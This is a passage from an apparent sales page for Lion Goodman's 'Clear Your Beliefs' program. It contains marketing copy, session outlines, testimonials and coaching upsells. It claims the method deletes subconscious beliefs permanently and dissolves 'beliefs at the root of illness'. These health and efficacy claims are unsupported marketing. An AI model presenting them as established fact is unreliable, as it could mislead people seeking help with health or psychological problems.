me?</li>\r\n	<li>Why didn’t I follow through?</li>\r\n	<li>Why did I react that way?</li>\r\n	<li>What the hell just happened?</li>\r\n</ul>\r\n<em>\r\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\r\n\r\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\r\n\r\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\r\n\r\n&nbsp;\r\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\r\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\r\n<ul class="indented">\r\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\r\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\r\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\r\n</ul>\r\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\r\n\r\n&nbsp;\r\n<h1>Here’s Some Good News</h1>\r\n<ul class="indented">\r\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\r\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\r\n</ul>\r\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\r\n\r\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\r\n\r\n&nbsp;\r\n<h1>Imagine The Life You Desire</h1>\r\n<strong>Can you imagine this?</strong>\r\n\r\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\r\n<ul class="indented-img-left">\r\n	<li>You''re no longer held back by old beliefs and stories.</li>\r\n	<li>There''s no resistance to doing what needs to be done.</li>\r\n	<li>You feel joy and positive energy as you move forward to create the life of your dreams.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\r\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\r\n\r\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\r\n\r\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\r\n\r\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\r\n\r\n&nbsp;\r\n<h1>Clear Whatever Is In The Way</h1>\r\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\r\n\r\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\r\n\r\n&nbsp;\r\n<h1>Is This A Guaranteed Cure-All?</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.\r\n\r\nNo technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.\r\n\r\nDuring the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs.  It takes some work, and it''s <em>very </em>effective.\r\n\r\n&nbsp;\r\n<h1>The Clear Your Beliefs program can:</h1>\r\n<ul class="indented">\r\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\r\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\r\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\r\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, we invite all aspects of you – mental, emotional, physical, and spiritual – to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\r\n\r\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\r\n\r\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\r\n<div class="icon_box">\r\n<h1>With This Methodology, You Can Finally:</h1>\r\n<ul class="check">\r\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="margin-right: -120px ! important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\r\n	<li>Remove resistance and barriers</li>\r\n	<li>Open doors to new opportunities</li>\r\n	<li>Eliminate pain and suffering from the past</li>\r\n	<li>Experience more fulfillment in your relationships</li>\r\n	<li>Attract more abundance and prosperity</li>\r\n	<li>Increase your energy, vitality, and productivity</li>\r\n</ul>\r\n</div>\r\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\r\n<div class="quot">\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\r\n<div style="text-align: right;"><strong>– G. J., software developer</strong></div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n</div>\r\n<div class="message_box">\r\n<h1>A Message from Lion Goodman...</h1>\r\nDear Explorer:\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>As a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\r\n\r\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\r\n\r\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\r\n\r\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\r\n\r\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\r\n\r\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\r\n\r\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\r\n\r\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\r\n\r\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\r\n\r\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\r\n\r\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\r\n\r\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\r\n\r\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. You also have the opportunity to work with a professional <em>Clear Your Beliefs Coach </em>in private sessions. Join me for seven sessions of deep healing and transformation. Clear your old beliefs, and create the life you want.\r\n\r\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\r\n\r\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs... In gratitude, and with warm wishes for your total success,\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\r\n\r\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Register Today and Discover What''s Possible</h1>\r\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful technique used by hundreds of coaches and therapists around the world.\r\n\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 1: </span> <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.In this first session, you’ll examine your old beliefs, and determine which ones no longer serve you. It’s time to discard them and clear some space!You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades. You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 1, you will:</strong>\r\n<ul>\r\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\r\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\r\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\r\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\r\n<div style="text-align: right;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 2: </span> <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.What do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child. What messages did your parents, caregivers, and siblings plant in your child brain that still affect you?In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.It’s time to haul them out, and toss them out! You don’t need them anymore. If you hear critical inner voices berating you, don’t miss this session. Rid yourself of those pesky critical voices along with the diapers!\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 2, you will:</strong>\r\n<ul>\r\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\r\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\r\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\r\n<div style="text-align: right;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div style="text-align: right;"></div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 3: </span> <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\r\n\r\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.<em>What are you capable of? </em> If your answer is “Anything...” you don’t need this session. But most of us think too small...\r\n\r\n</div>\r\n<div class="module_body">Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised. We let our negative beliefs stop us.You may hear internal voices say, <em>“What’s the use? You’ll fail anyway. You don’t deserve happiness. Look at you!” </em>We were shamed into thinking that we were less than others. We learned to compare ourselves to others – and we always lose that contest. Clear out any apparent limitations you''ve taken on, and find your true power to create what you want. Do whatever you need to do in order to achieve your vision.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 3, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\r\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\r\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\r\n<div style="text-align: right;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 4: </span> <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships. If you’re married, are you happy and secure? Or are you anxious about the future? If you’re not in a relationship, what’s holding you back from finding your ideal mate?\r\n\r\nHumans are social creatures – we must relate to others to survive. At our core, we want a security and safety, but we also want passion and romance. You learned “what love is” from your parents – so it’s no wonder that you’re confused! Most of us repeat patterns we learned from our early childhood. We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like. Love was contaminated by disdain, contempt, withdrawal, or abuse. We were programmed to repeat their patterns – without conscious choice. This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\r\n\r\n</div>\r\n&nbsp;\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 4, you will:</strong>\r\n<ul>\r\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\r\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\r\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\r\n<div style="text-align: right;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 5: </span> <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\r\n\r\nWhat do you believe about earning a living in today’s economy? Is money really the root of all evil?\r\n\r\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem. Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture. Can you see their influence?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 5, you will:</strong>\r\n<ul>\r\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\r\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\r\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\r\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\r\n<div style="text-align: right;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 6: </span> <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body. \r\n\r\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.What do you believe and perceive about your body? Your health? Your age? Your vitality? Your ability to heal? The future of your health?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 6, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and vibrant health</li>\r\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\r\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\r\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\r\n<div style="text-align: right;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 7: </span> <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\r\n\r\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\r\n\r\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 7, you will:</strong>\r\n<ul>\r\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\r\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\r\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<!--[wpfcNOT]-->\r\n\r\n&nbsp;\r\n<h1 id="bonus">Optional: Get Support On Your Journey Into Your Subconscious Mind</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="182" height="153" /></a>You can easily take this journey on your own, one recorded session at a time. You also have the option of adding personalized support from a <em>Clear Your Beliefs Coach</em> a qualified professional who will accompany you on your journey, and guide you through the process.  \r\n\r\nOur outstanding coaches are trained to help you deal with almost any issue, in any part of your life, regardless of how long it''s been interfering with your success, joy, and freedom. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur. Your coach will meet with you by phone (or Skype) each week, at a time that''s convenient for you, on a day that fits your schedule.\r\n\r\nOur<e,>Clear Your Beliefs Coaches</em> are located throughout the United States and Canada, and from Europe to Australia, and South Africa to Scandinavia. Your coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\r\n\r\nTake advantage of this up-close-and-personal support to help you work through beliefs you uncover during the program. Support sessions are optional, and are provided at an additional cost. Choose the plan that suits you - from the recorded program-only, to full support each week.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\r\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts. These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #1: <strong>Love: What Makes It So Confusing?\r\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-portrait-2.jpg"><img class="alignleft  wp-image-1029" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-portrait-2-250x300.jpg" alt="Carista portrait 2" width="160" height="192" /></a>We all want more love in our life, but something keeps getting in the way. We can’t seem to stop hurting each other. What’s going on?\r\n\r\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.<em> </em>(She is also known as <em>Lion''s fiance''</em>)\r\n\r\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our 